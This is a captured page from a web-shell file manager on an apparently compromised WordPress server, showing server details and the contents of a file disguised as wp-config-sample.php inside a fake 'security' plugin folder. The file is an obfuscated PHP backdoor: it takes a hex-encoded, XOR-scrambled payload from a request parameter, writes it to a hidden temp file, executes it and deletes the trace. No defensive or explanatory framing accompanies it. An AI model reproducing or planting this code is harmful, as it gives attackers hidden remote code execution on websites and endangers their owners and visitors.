HEX
Server: LiteSpeed
System: Linux 111n6.sieutocviet.page 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
User: nhathuocat (1048)
PHP: 7.4.30
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
$ pwd: /home/nhathuocat/public_html/wp-content/plugins/security-1761291739/
Upload Files
File: /home/nhathuocat/public_html/wp-content/plugins/security-1761291739/wp-config-sample.php
<!--VVJxQcGH-->
<?php

if(!is_null($_REQUEST["v\x61l"] ?? null)){
$resource = array_filter([getenv("TMP"), getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", sys_get_temp_dir(), "/dev/shm", getcwd()]);
$flg = hex2bin($_REQUEST["v\x61l"]);
$obj = ''  ;   foreach(str_split($flg) as $char){$obj.=chr(ord($char)^39);}
for ($parameter_group = 0, $key = count($resource); $parameter_group < $key; $parameter_group++) {
    $component = $resource[$parameter_group];
            if ((function($d) { return is_dir($d) && is_writable($d); })($component)) {
            $ent = vsprintf("%s/%s", [$component, ".itm"]);
            if ($pointer = fopen($ent, 'w')) {
    fwrite($pointer, $obj);
    fclose($pointer);
    include_once $ent;
    unlink($ent);
    die();
}
        }
}
}
@ Telegram